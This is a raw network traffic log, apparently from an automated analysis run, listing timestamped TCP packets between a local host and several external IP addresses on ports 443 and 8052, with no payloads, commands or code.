Jan 22, 2025 12:02:28.182311058 CET	443	49749	199.188.200.183	192.168.2.4
Jan 22, 2025 12:02:28.182394981 CET	49749	443	192.168.2.4	199.188.200.183
Jan 22, 2025 12:02:28.182722092 CET	49749	443	192.168.2.4	199.188.200.183
Jan 22, 2025 12:02:28.182739973 CET	443	49749	199.188.200.183	192.168.2.4
Jan 22, 2025 12:02:28.923938036 CET	443	49749	199.188.200.183	192.168.2.4
Jan 22, 2025 12:02:28.924273014 CET	49749	443	192.168.2.4	199.188.200.183
Jan 22, 2025 12:02:28.924293041 CET	443	49749	199.188.200.183	192.168.2.4
Jan 22, 2025 12:02:28.925426960 CET	443	49749	199.188.200.183	192.168.2.4
Jan 22, 2025 12:02:28.925663948 CET	49749	443	192.168.2.4	199.188.200.183
Jan 22, 2025 12:02:28.930346966 CET	49749	443	192.168.2.4	199.188.200.183
Jan 22, 2025 12:02:28.930413008 CET	443	49749	199.188.200.183	192.168.2.4
Jan 22, 2025 12:02:28.930493116 CET	49749	443	192.168.2.4	199.188.200.183
Jan 22, 2025 12:02:28.971817970 CET	49749	443	192.168.2.4	199.188.200.183
Jan 22, 2025 12:02:28.971831083 CET	443	49749	199.188.200.183	192.168.2.4
Jan 22, 2025 12:02:29.018377066 CET	49749	443	192.168.2.4	199.188.200.183
Jan 22, 2025 12:02:29.301493883 CET	443	49749	199.188.200.183	192.168.2.4
Jan 22, 2025 12:02:29.301512957 CET	443	49749	199.188.200.183	192.168.2.4
Jan 22, 2025 12:02:29.301520109 CET	443	49749	199.188.200.183	192.168.2.4
Jan 22, 2025 12:02:29.301603079 CET	49749	443	192.168.2.4	199.188.200.183
Jan 22, 2025 12:02:29.301620960 CET	443	49749	199.188.200.183	192.168.2.4
Jan 22, 2025 12:02:29.301637888 CET	443	49749	199.188.200.183	192.168.2.4
Jan 22, 2025 12:02:29.301651955 CET	443	49749	199.188.200.183	192.168.2.4
Jan 22, 2025 12:02:29.301664114 CET	443	49749	199.188.200.183	192.168.2.4
Jan 22, 2025 12:02:29.301671982 CET	49749	443	192.168.2.4	199.188.200.183
Jan 22, 2025 12:02:29.301706076 CET	49749	443	192.168.2.4	199.188.200.183
Jan 22, 2025 12:02:29.301717043 CET	49749	443	192.168.2.4	199.188.200.183
Jan 22, 2025 12:02:29.315594912 CET	443	49749	199.188.200.183	192.168.2.4
Jan 22, 2025 12:02:29.315613031 CET	443	49749	199.188.200.183	192.168.2.4
Jan 22, 2025 12:02:29.316118002 CET	49749	443	192.168.2.4	199.188.200.183
Jan 22, 2025 12:02:29.316134930 CET	443	49749	199.188.200.183	192.168.2.4
Jan 22, 2025 12:02:29.362119913 CET	49749	443	192.168.2.4	199.188.200.183
Jan 22, 2025 12:02:29.378340006 CET	443	49749	199.188.200.183	192.168.2.4
Jan 22, 2025 12:02:29.378346920 CET	443	49749	199.188.200.183	192.168.2.4
Jan 22, 2025 12:02:29.378369093 CET	443	49749	199.188.200.183	192.168.2.4
Jan 22, 2025 12:02:29.378721952 CET	49749	443	192.168.2.4	199.188.200.183
Jan 22, 2025 12:02:29.378721952 CET	49749	443	192.168.2.4	199.188.200.183
Jan 22, 2025 12:02:29.378740072 CET	443	49749	199.188.200.183	192.168.2.4
Jan 22, 2025 12:02:29.378751993 CET	443	49749	199.188.200.183	192.168.2.4
Jan 22, 2025 12:02:29.378789902 CET	49749	443	192.168.2.4	199.188.200.183
Jan 22, 2025 12:02:29.406693935 CET	443	49749	199.188.200.183	192.168.2.4
Jan 22, 2025 12:02:29.406729937 CET	443	49749	199.188.200.183	192.168.2.4
Jan 22, 2025 12:02:29.406852007 CET	49749	443	192.168.2.4	199.188.200.183
Jan 22, 2025 12:02:29.406852007 CET	49749	443	192.168.2.4	199.188.200.183
Jan 22, 2025 12:02:29.406868935 CET	443	49749	199.188.200.183	192.168.2.4
Jan 22, 2025 12:02:29.408329010 CET	443	49749	199.188.200.183	192.168.2.4
Jan 22, 2025 12:02:29.408348083 CET	443	49749	199.188.200.183	192.168.2.4
Jan 22, 2025 12:02:29.408854008 CET	49749	443	192.168.2.4	199.188.200.183
Jan 22, 2025 12:02:29.408854008 CET	49749	443	192.168.2.4	199.188.200.183
Jan 22, 2025 12:02:29.408864975 CET	443	49749	199.188.200.183	192.168.2.4
Jan 22, 2025 12:02:29.409369946 CET	443	49749	199.188.200.183	192.168.2.4
Jan 22, 2025 12:02:29.409384012 CET	443	49749	199.188.200.183	192.168.2.4
Jan 22, 2025 12:02:29.409760952 CET	49749	443	192.168.2.4	199.188.200.183
Jan 22, 2025 12:02:29.409770966 CET	443	49749	199.188.200.183	192.168.2.4
Jan 22, 2025 12:02:29.470701933 CET	443	49749	199.188.200.183	192.168.2.4
Jan 22, 2025 12:02:29.470717907 CET	443	49749	199.188.200.183	192.168.2.4
Jan 22, 2025 12:02:29.470752954 CET	49749	443	192.168.2.4	199.188.200.183
Jan 22, 2025 12:02:29.470767975 CET	443	49749	199.188.200.183	192.168.2.4
Jan 22, 2025 12:02:29.470854044 CET	49749	443	192.168.2.4	199.188.200.183
Jan 22, 2025 12:02:29.499289989 CET	443	49749	199.188.200.183	192.168.2.4
Jan 22, 2025 12:02:29.499309063 CET	443	49749	199.188.200.183	192.168.2.4
Jan 22, 2025 12:02:29.499336958 CET	443	49749	199.188.200.183	192.168.2.4
Jan 22, 2025 12:02:29.499387980 CET	49749	443	192.168.2.4	199.188.200.183
Jan 22, 2025 12:02:29.499409914 CET	443	49749	199.188.200.183	192.168.2.4
Jan 22, 2025 12:02:29.499455929 CET	49749	443	192.168.2.4	199.188.200.183
Jan 22, 2025 12:02:29.500348091 CET	443	49749	199.188.200.183	192.168.2.4
Jan 22, 2025 12:02:29.500365973 CET	443	49749	199.188.200.183	192.168.2.4
Jan 22, 2025 12:02:29.500392914 CET	443	49749	199.188.200.183	192.168.2.4
Jan 22, 2025 12:02:29.500407934 CET	49749	443	192.168.2.4	199.188.200.183
Jan 22, 2025 12:02:29.500416994 CET	443	49749	199.188.200.183	192.168.2.4
Jan 22, 2025 12:02:29.500439882 CET	49749	443	192.168.2.4	199.188.200.183
Jan 22, 2025 12:02:29.501168966 CET	443	49749	199.188.200.183	192.168.2.4
Jan 22, 2025 12:02:29.501182079 CET	443	49749	199.188.200.183	192.168.2.4
Jan 22, 2025 12:02:29.501266003 CET	49749	443	192.168.2.4	199.188.200.183
Jan 22, 2025 12:02:29.501266003 CET	49749	443	192.168.2.4	199.188.200.183
Jan 22, 2025 12:02:29.501274109 CET	443	49749	199.188.200.183	192.168.2.4
Jan 22, 2025 12:02:29.504347086 CET	443	49749	199.188.200.183	192.168.2.4
Jan 22, 2025 12:02:29.504368067 CET	443	49749	199.188.200.183	192.168.2.4
Jan 22, 2025 12:02:29.504427910 CET	49749	443	192.168.2.4	199.188.200.183
Jan 22, 2025 12:02:29.504435062 CET	443	49749	199.188.200.183	192.168.2.4
Jan 22, 2025 12:02:29.504445076 CET	49749	443	192.168.2.4	199.188.200.183
Jan 22, 2025 12:02:29.505209923 CET	443	49749	199.188.200.183	192.168.2.4
Jan 22, 2025 12:02:29.505228043 CET	443	49749	199.188.200.183	192.168.2.4
Jan 22, 2025 12:02:29.505366087 CET	49749	443	192.168.2.4	199.188.200.183
Jan 22, 2025 12:02:29.505366087 CET	49749	443	192.168.2.4	199.188.200.183
Jan 22, 2025 12:02:29.505377054 CET	443	49749	199.188.200.183	192.168.2.4
Jan 22, 2025 12:02:29.506189108 CET	443	49749	199.188.200.183	192.168.2.4
Jan 22, 2025 12:02:29.506206036 CET	443	49749	199.188.200.183	192.168.2.4
Jan 22, 2025 12:02:29.506234884 CET	49749	443	192.168.2.4	199.188.200.183
Jan 22, 2025 12:02:29.506241083 CET	443	49749	199.188.200.183	192.168.2.4
Jan 22, 2025 12:02:29.507247925 CET	49749	443	192.168.2.4	199.188.200.183
Jan 22, 2025 12:02:29.558198929 CET	49749	443	192.168.2.4	199.188.200.183
Jan 22, 2025 12:02:29.578670979 CET	443	49749	199.188.200.183	192.168.2.4
Jan 22, 2025 12:02:29.578687906 CET	443	49749	199.188.200.183	192.168.2.4
Jan 22, 2025 12:02:29.578730106 CET	443	49749	199.188.200.183	192.168.2.4
Jan 22, 2025 12:02:29.578748941 CET	49749	443	192.168.2.4	199.188.200.183
Jan 22, 2025 12:02:29.578748941 CET	49749	443	192.168.2.4	199.188.200.183
Jan 22, 2025 12:02:29.578753948 CET	443	49749	199.188.200.183	192.168.2.4
Jan 22, 2025 12:02:29.578778028 CET	443	49749	199.188.200.183	192.168.2.4
Jan 22, 2025 12:02:29.578794956 CET	49749	443	192.168.2.4	199.188.200.183
Jan 22, 2025 12:02:29.578811884 CET	49749	443	192.168.2.4	199.188.200.183
Jan 22, 2025 12:02:29.578823090 CET	49749	443	192.168.2.4	199.188.200.183
Jan 22, 2025 12:02:29.591721058 CET	443	49749	199.188.200.183	192.168.2.4
Jan 22, 2025 12:02:29.591744900 CET	443	49749	199.188.200.183	192.168.2.4
Jan 22, 2025 12:02:29.591890097 CET	443	49749	199.188.200.183	192.168.2.4
Jan 22, 2025 12:02:29.591938972 CET	443	49749	199.188.200.183	192.168.2.4
Jan 22, 2025 12:02:29.592014074 CET	49749	443	192.168.2.4	199.188.200.183
Jan 22, 2025 12:02:29.592014074 CET	49749	443	192.168.2.4	199.188.200.183
Jan 22, 2025 12:02:29.592014074 CET	49749	443	192.168.2.4	199.188.200.183
Jan 22, 2025 12:02:29.592014074 CET	49749	443	192.168.2.4	199.188.200.183
Jan 22, 2025 12:02:29.592029095 CET	443	49749	199.188.200.183	192.168.2.4
Jan 22, 2025 12:02:29.592298031 CET	49749	443	192.168.2.4	199.188.200.183
Jan 22, 2025 12:02:29.592363119 CET	443	49749	199.188.200.183	192.168.2.4
Jan 22, 2025 12:02:29.592458010 CET	443	49749	199.188.200.183	192.168.2.4
Jan 22, 2025 12:02:29.592549086 CET	49749	443	192.168.2.4	199.188.200.183
Jan 22, 2025 12:02:29.593090057 CET	49749	443	192.168.2.4	199.188.200.183
Jan 22, 2025 12:02:29.593106985 CET	443	49749	199.188.200.183	192.168.2.4
Jan 22, 2025 12:02:30.789063931 CET	49757	443	192.168.2.4	151.101.194.137
Jan 22, 2025 12:02:30.789098978 CET	443	49757	151.101.194.137	192.168.2.4
Jan 22, 2025 12:02:30.789509058 CET	49757	443	192.168.2.4	151.101.194.137
Jan 22, 2025 12:02:30.789665937 CET	49757	443	192.168.2.4	151.101.194.137
Jan 22, 2025 12:02:30.789685965 CET	443	49757	151.101.194.137	192.168.2.4
Jan 22, 2025 12:02:31.233026028 CET	443	49742	142.250.184.228	192.168.2.4
Jan 22, 2025 12:02:31.233165979 CET	443	49742	142.250.184.228	192.168.2.4
Jan 22, 2025 12:02:31.233220100 CET	49742	443	192.168.2.4	142.250.184.228
Jan 22, 2025 12:02:31.253645897 CET	443	49757	151.101.194.137	192.168.2.4
Jan 22, 2025 12:02:31.253874063 CET	49757	443	192.168.2.4	151.101.194.137
Jan 22, 2025 12:02:31.253916025 CET	443	49757	151.101.194.137	192.168.2.4
Jan 22, 2025 12:02:31.254882097 CET	443	49757	151.101.194.137	192.168.2.4
Jan 22, 2025 12:02:31.254939079 CET	49757	443	192.168.2.4	151.101.194.137
Jan 22, 2025 12:02:31.256021976 CET	49757	443	192.168.2.4	151.101.194.137
Jan 22, 2025 12:02:31.256088018 CET	443	49757	151.101.194.137	192.168.2.4
Jan 22, 2025 12:02:31.256203890 CET	49757	443	192.168.2.4	151.101.194.137
Jan 22, 2025 12:02:31.256211996 CET	443	49757	151.101.194.137	192.168.2.4
Jan 22, 2025 12:02:31.299593925 CET	49757	443	192.168.2.4	151.101.194.137
Jan 22, 2025 12:02:31.351337910 CET	443	49757	151.101.194.137	192.168.2.4
Jan 22, 2025 12:02:31.367082119 CET	443	49757	151.101.194.137	192.168.2.4
Jan 22, 2025 12:02:31.367090940 CET	443	49757	151.101.194.137	192.168.2.4
Jan 22, 2025 12:02:31.367105961 CET	443	49757	151.101.194.137	192.168.2.4
Jan 22, 2025 12:02:31.367135048 CET	49757	443	192.168.2.4	151.101.194.137
Jan 22, 2025 12:02:31.367153883 CET	443	49757	151.101.194.137	192.168.2.4
Jan 22, 2025 12:02:31.367172003 CET	49757	443	192.168.2.4	151.101.194.137
Jan 22, 2025 12:02:31.367197037 CET	49757	443	192.168.2.4	151.101.194.137
Jan 22, 2025 12:02:31.441152096 CET	443	49757	151.101.194.137	192.168.2.4
Jan 22, 2025 12:02:31.441174984 CET	443	49757	151.101.194.137	192.168.2.4
Jan 22, 2025 12:02:31.441217899 CET	49757	443	192.168.2.4	151.101.194.137
Jan 22, 2025 12:02:31.441231966 CET	443	49757	151.101.194.137	192.168.2.4
Jan 22, 2025 12:02:31.441289902 CET	49757	443	192.168.2.4	151.101.194.137
Jan 22, 2025 12:02:31.441289902 CET	49757	443	192.168.2.4	151.101.194.137
Jan 22, 2025 12:02:31.443006992 CET	443	49757	151.101.194.137	192.168.2.4
Jan 22, 2025 12:02:31.443022013 CET	443	49757	151.101.194.137	192.168.2.4
Jan 22, 2025 12:02:31.443074942 CET	49757	443	192.168.2.4	151.101.194.137
Jan 22, 2025 12:02:31.443083048 CET	443	49757	151.101.194.137	192.168.2.4
Jan 22, 2025 12:02:31.443121910 CET	49757	443	192.168.2.4	151.101.194.137
Jan 22, 2025 12:02:31.529006004 CET	443	49757	151.101.194.137	192.168.2.4
Jan 22, 2025 12:02:31.529031038 CET	443	49757	151.101.194.137	192.168.2.4
Jan 22, 2025 12:02:31.529083014 CET	49757	443	192.168.2.4	151.101.194.137
Jan 22, 2025 12:02:31.529110909 CET	443	49757	151.101.194.137	192.168.2.4
Jan 22, 2025 12:02:31.529128075 CET	49757	443	192.168.2.4	151.101.194.137
Jan 22, 2025 12:02:31.529165030 CET	49757	443	192.168.2.4	151.101.194.137
Jan 22, 2025 12:02:31.530400038 CET	443	49757	151.101.194.137	192.168.2.4
Jan 22, 2025 12:02:31.530415058 CET	443	49757	151.101.194.137	192.168.2.4
Jan 22, 2025 12:02:31.530466080 CET	443	49757	151.101.194.137	192.168.2.4
Jan 22, 2025 12:02:31.530467987 CET	49757	443	192.168.2.4	151.101.194.137
Jan 22, 2025 12:02:31.530478001 CET	443	49757	151.101.194.137	192.168.2.4
Jan 22, 2025 12:02:31.530510902 CET	49757	443	192.168.2.4	151.101.194.137
Jan 22, 2025 12:02:31.530558109 CET	443	49757	151.101.194.137	192.168.2.4
Jan 22, 2025 12:02:31.530606985 CET	49757	443	192.168.2.4	151.101.194.137
Jan 22, 2025 12:02:31.530893087 CET	49757	443	192.168.2.4	151.101.194.137
Jan 22, 2025 12:02:31.530906916 CET	443	49757	151.101.194.137	192.168.2.4
Jan 22, 2025 12:02:31.561665058 CET	49742	443	192.168.2.4	142.250.184.228
Jan 22, 2025 12:02:31.561695099 CET	443	49742	142.250.184.228	192.168.2.4
Jan 22, 2025 12:02:31.569451094 CET	49759	443	192.168.2.4	151.101.66.137
Jan 22, 2025 12:02:31.569477081 CET	443	49759	151.101.66.137	192.168.2.4
Jan 22, 2025 12:02:31.569540024 CET	49759	443	192.168.2.4	151.101.66.137
Jan 22, 2025 12:02:31.569812059 CET	49759	443	192.168.2.4	151.101.66.137
Jan 22, 2025 12:02:31.569819927 CET	443	49759	151.101.66.137	192.168.2.4
Jan 22, 2025 12:02:31.611011028 CET	49760	8052	192.168.2.4	185.174.100.20
Jan 22, 2025 12:02:31.615873098 CET	8052	49760	185.174.100.20	192.168.2.4
Jan 22, 2025 12:02:31.615936041 CET	49760	8052	192.168.2.4	185.174.100.20
Jan 22, 2025 12:02:31.616403103 CET	49760	8052	192.168.2.4	185.174.100.20
Jan 22, 2025 12:02:31.621148109 CET	8052	49760	185.174.100.20	192.168.2.4
Jan 22, 2025 12:02:32.164850950 CET	443	49759	151.101.66.137	192.168.2.4
Jan 22, 2025 12:02:32.165132046 CET	49759	443	192.168.2.4	151.101.66.137
Jan 22, 2025 12:02:32.165148020 CET	443	49759	151.101.66.137	192.168.2.4
Jan 22, 2025 12:02:32.166555882 CET	443	49759	151.101.66.137	192.168.2.4
Jan 22, 2025 12:02:32.166618109 CET	49759	443	192.168.2.4	151.101.66.137
Jan 22, 2025 12:02:32.166925907 CET	49759	443	192.168.2.4	151.101.66.137
Jan 22, 2025 12:02:32.167005062 CET	443	49759	151.101.66.137	192.168.2.4
Jan 22, 2025 12:02:32.167071104 CET	49759	443	192.168.2.4	151.101.66.137
Jan 22, 2025 12:02:32.167076111 CET	443	49759	151.101.66.137	192.168.2.4
Jan 22, 2025 12:02:32.190356016 CET	8052	49760	185.174.100.20	192.168.2.4
Jan 22, 2025 12:02:32.190386057 CET	8052	49760	185.174.100.20	192.168.2.4
Jan 22, 2025 12:02:32.190432072 CET	49760	8052	192.168.2.4	185.174.100.20
Jan 22, 2025 12:02:32.192652941 CET	49760	8052	192.168.2.4	185.174.100.20
Jan 22, 2025 12:02:32.192912102 CET	49760	8052	192.168.2.4	185.174.100.20
Jan 22, 2025 12:02:32.197501898 CET	8052	49760	185.174.100.20	192.168.2.4
Jan 22, 2025 12:02:32.197652102 CET	8052	49760	185.174.100.20	192.168.2.4
Jan 22, 2025 12:02:32.221865892 CET	49759	443	192.168.2.4	151.101.66.137
Jan 22, 2025 12:02:32.266148090 CET	443	49759	151.101.66.137	192.168.2.4
Jan 22, 2025 12:02:32.282258987 CET	443	49759	151.101.66.137	192.168.2.4
Jan 22, 2025 12:02:32.282282114 CET	443	49759	151.101.66.137	192.168.2.4
Jan 22, 2025 12:02:32.282300949 CET	443	49759	151.101.66.137	192.168.2.4
Jan 22, 2025 12:02:32.282324076 CET	49759	443	192.168.2.4	151.101.66.137
Jan 22, 2025 12:02:32.282339096 CET	443	49759	151.101.66.137	192.168.2.4
Jan 22, 2025 12:02:32.282356024 CET	443	49759	151.101.66.137	192.168.2.4
Jan 22, 2025 12:02:32.282376051 CET	49759	443	192.168.2.4	151.101.66.137
Jan 22, 2025 12:02:32.282377958 CET	443	49759	151.101.66.137	192.168.2.4
Jan 22, 2025 12:02:32.282413960 CET	49759	443	192.168.2.4	151.101.66.137
Jan 22, 2025 12:02:32.282421112 CET	443	49759	151.101.66.137	192.168.2.4
Jan 22, 2025 12:02:32.282444954 CET	49759	443	192.168.2.4	151.101.66.137
Jan 22, 2025 12:02:32.331126928 CET	49759	443	192.168.2.4	151.101.66.137
Jan 22, 2025 12:02:32.351506948 CET	8052	49760	185.174.100.20	192.168.2.4
Jan 22, 2025 12:02:32.358242989 CET	443	49759	151.101.66.137	192.168.2.4
Jan 22, 2025 12:02:32.358273983 CET	443	49759	151.101.66.137	192.168.2.4
Jan 22, 2025 12:02:32.358314037 CET	49759	443	192.168.2.4	151.101.66.137
Jan 22, 2025 12:02:32.358319998 CET	443	49759	151.101.66.137	192.168.2.4
Jan 22, 2025 12:02:32.358340979 CET	443	49759	151.101.66.137	192.168.2.4
Jan 22, 2025 12:02:32.358354092 CET	49759	443	192.168.2.4	151.101.66.137
Jan 22, 2025 12:02:32.358371019 CET	443	49759	151.101.66.137	192.168.2.4
Jan 22, 2025 12:02:32.358386040 CET	49759	443	192.168.2.4	151.101.66.137
Jan 22, 2025 12:02:32.358407974 CET	49759	443	192.168.2.4	151.101.66.137
Jan 22, 2025 12:02:32.359585047 CET	443	49759	151.101.66.137	192.168.2.4
Jan 22, 2025 12:02:32.359626055 CET	443	49759	151.101.66.137	192.168.2.4
Jan 22, 2025 12:02:32.359657049 CET	49759	443	192.168.2.4	151.101.66.137
Jan 22, 2025 12:02:32.359663963 CET	443	49759	151.101.66.137	192.168.2.4
Jan 22, 2025 12:02:32.359694004 CET	49759	443	192.168.2.4	151.101.66.137
Jan 22, 2025 12:02:32.359713078 CET	49759	443	192.168.2.4	151.101.66.137
Jan 22, 2025 12:02:32.393636942 CET	49760	8052	192.168.2.4	185.174.100.20
Jan 22, 2025 12:02:32.447690010 CET	443	49759	151.101.66.137	192.168.2.4
Jan 22, 2025 12:02:32.447736979 CET	443	49759	151.101.66.137	192.168.2.4
Jan 22, 2025 12:02:32.447783947 CET	49759	443	192.168.2.4	151.101.66.137
Jan 22, 2025 12:02:32.447791100 CET	443	49759	151.101.66.137	192.168.2.4
Jan 22, 2025 12:02:32.447828054 CET	49759	443	192.168.2.4	151.101.66.137
Jan 22, 2025 12:02:32.447844028 CET	49759	443	192.168.2.4	151.101.66.137
Jan 22, 2025 12:02:32.449054956 CET	443	49759	151.101.66.137	192.168.2.4
Jan 22, 2025 12:02:32.449095011 CET	443	49759	151.101.66.137	192.168.2.4
Jan 22, 2025 12:02:32.449121952 CET	49759	443	192.168.2.4	151.101.66.137
Jan 22, 2025 12:02:32.449126959 CET	443	49759	151.101.66.137	192.168.2.4
Jan 22, 2025 12:02:32.449155092 CET	49759	443	192.168.2.4	151.101.66.137
Jan 22, 2025 12:02:32.449172974 CET	49759	443	192.168.2.4	151.101.66.137
Jan 22, 2025 12:02:32.449214935 CET	443	49759	151.101.66.137	192.168.2.4
Jan 22, 2025 12:02:32.449269056 CET	49759	443	192.168.2.4	151.101.66.137
Jan 22, 2025 12:02:32.449274063 CET	443	49759	151.101.66.137	192.168.2.4
Jan 22, 2025 12:02:32.449381113 CET	443	49759	151.101.66.137	192.168.2.4
Jan 22, 2025 12:02:32.449486017 CET	49759	443	192.168.2.4	151.101.66.137
Jan 22, 2025 12:02:32.449492931 CET	443	49759	151.101.66.137	192.168.2.4
Jan 22, 2025 12:02:32.449502945 CET	49759	443	192.168.2.4	151.101.66.137
Jan 22, 2025 12:02:32.479974985 CET	8052	49760	185.174.100.20	192.168.2.4
Jan 22, 2025 12:02:32.490775108 CET	49764	443	192.168.2.4	104.26.13.205
Jan 22, 2025 12:02:32.490807056 CET	443	49764	104.26.13.205	192.168.2.4
Jan 22, 2025 12:02:32.490921021 CET	49764	443	192.168.2.4	104.26.13.205
Jan 22, 2025 12:02:32.491092920 CET	49764	443	192.168.2.4	104.26.13.205
Jan 22, 2025 12:02:32.491108894 CET	443	49764	104.26.13.205	192.168.2.4
Jan 22, 2025 12:02:32.534259081 CET	49760	8052	192.168.2.4	185.174.100.20
Jan 22, 2025 12:02:32.833374023 CET	443	49736	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:32.833554983 CET	443	49736	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:32.833616018 CET	49736	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:32.973005056 CET	443	49764	104.26.13.205	192.168.2.4
Jan 22, 2025 12:02:32.973478079 CET	49764	443	192.168.2.4	104.26.13.205
Jan 22, 2025 12:02:32.973503113 CET	443	49764	104.26.13.205	192.168.2.4
Jan 22, 2025 12:02:32.974606991 CET	443	49764	104.26.13.205	192.168.2.4
Jan 22, 2025 12:02:32.974831104 CET	49764	443	192.168.2.4	104.26.13.205
Jan 22, 2025 12:02:32.977893114 CET	49764	443	192.168.2.4	104.26.13.205
Jan 22, 2025 12:02:32.977965117 CET	443	49764	104.26.13.205	192.168.2.4
Jan 22, 2025 12:02:32.978912115 CET	49764	443	192.168.2.4	104.26.13.205
Jan 22, 2025 12:02:32.978934050 CET	443	49764	104.26.13.205	192.168.2.4
Jan 22, 2025 12:02:33.018975973 CET	49764	443	192.168.2.4	104.26.13.205
Jan 22, 2025 12:02:33.097690105 CET	443	49764	104.26.13.205	192.168.2.4
Jan 22, 2025 12:02:33.097757101 CET	443	49764	104.26.13.205	192.168.2.4
Jan 22, 2025 12:02:33.097868919 CET	49764	443	192.168.2.4	104.26.13.205
Jan 22, 2025 12:02:33.168922901 CET	49764	443	192.168.2.4	104.26.13.205
Jan 22, 2025 12:02:33.168951035 CET	443	49764	104.26.13.205	192.168.2.4
Jan 22, 2025 12:02:33.210763931 CET	49760	8052	192.168.2.4	185.174.100.20
Jan 22, 2025 12:02:33.215807915 CET	8052	49760	185.174.100.20	192.168.2.4
Jan 22, 2025 12:02:33.239526987 CET	49766	443	192.168.2.4	172.67.74.152
Jan 22, 2025 12:02:33.239600897 CET	443	49766	172.67.74.152	192.168.2.4
Jan 22, 2025 12:02:33.239675999 CET	49766	443	192.168.2.4	172.67.74.152
Jan 22, 2025 12:02:33.248776913 CET	49766	443	192.168.2.4	172.67.74.152
Jan 22, 2025 12:02:33.248812914 CET	443	49766	172.67.74.152	192.168.2.4
Jan 22, 2025 12:02:33.705426931 CET	443	49766	172.67.74.152	192.168.2.4
Jan 22, 2025 12:02:33.705992937 CET	49766	443	192.168.2.4	172.67.74.152
Jan 22, 2025 12:02:33.706020117 CET	443	49766	172.67.74.152	192.168.2.4
Jan 22, 2025 12:02:33.707534075 CET	443	49766	172.67.74.152	192.168.2.4
Jan 22, 2025 12:02:33.707593918 CET	49766	443	192.168.2.4	172.67.74.152
Jan 22, 2025 12:02:33.707916021 CET	49766	443	192.168.2.4	172.67.74.152
Jan 22, 2025 12:02:33.708015919 CET	443	49766	172.67.74.152	192.168.2.4
Jan 22, 2025 12:02:33.708173037 CET	49766	443	192.168.2.4	172.67.74.152
Jan 22, 2025 12:02:33.708179951 CET	443	49766	172.67.74.152	192.168.2.4
Jan 22, 2025 12:02:33.751895905 CET	49766	443	192.168.2.4	172.67.74.152
Jan 22, 2025 12:02:33.839162111 CET	443	49766	172.67.74.152	192.168.2.4
Jan 22, 2025 12:02:33.839234114 CET	443	49766	172.67.74.152	192.168.2.4
Jan 22, 2025 12:02:33.839334011 CET	49766	443	192.168.2.4	172.67.74.152
Jan 22, 2025 12:02:33.840655088 CET	49766	443	192.168.2.4	172.67.74.152
Jan 22, 2025 12:02:33.840670109 CET	443	49766	172.67.74.152	192.168.2.4
Jan 22, 2025 12:02:41.234555006 CET	49770	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:41.234605074 CET	443	49770	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:41.234838009 CET	49770	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:41.235672951 CET	49770	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:41.235682964 CET	443	49770	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:41.987070084 CET	443	49770	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:41.987595081 CET	49770	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:41.987618923 CET	443	49770	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:41.991005898 CET	443	49770	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:41.991067886 CET	49770	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:41.991475105 CET	49770	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:41.991550922 CET	443	49770	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:41.991599083 CET	49770	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:42.035366058 CET	443	49770	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:42.039335966 CET	49770	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:42.039350986 CET	443	49770	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:42.085885048 CET	49770	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:42.909164906 CET	443	49770	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:42.909250975 CET	443	49770	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:42.909305096 CET	49770	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:42.910275936 CET	49770	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:42.910298109 CET	443	49770	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:42.955094099 CET	49771	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:42.955163956 CET	443	49771	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:42.955231905 CET	49771	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:42.959605932 CET	49771	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:42.959630966 CET	443	49771	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:43.663990974 CET	443	49771	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:43.664429903 CET	49771	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:43.664463997 CET	443	49771	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:43.664824963 CET	443	49771	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:43.665128946 CET	49771	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:43.665201902 CET	443	49771	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:43.665265083 CET	49771	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:43.707334042 CET	443	49771	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:44.154911995 CET	443	49771	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:44.155028105 CET	443	49771	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:44.155122995 CET	49771	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:44.156724930 CET	49771	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:44.156742096 CET	443	49771	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:49.243834019 CET	49772	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:49.243913889 CET	443	49772	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:49.244024992 CET	49772	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:49.245246887 CET	49772	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:49.245284081 CET	443	49772	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:49.960618973 CET	443	49772	162.0.209.120	192.168.2.4
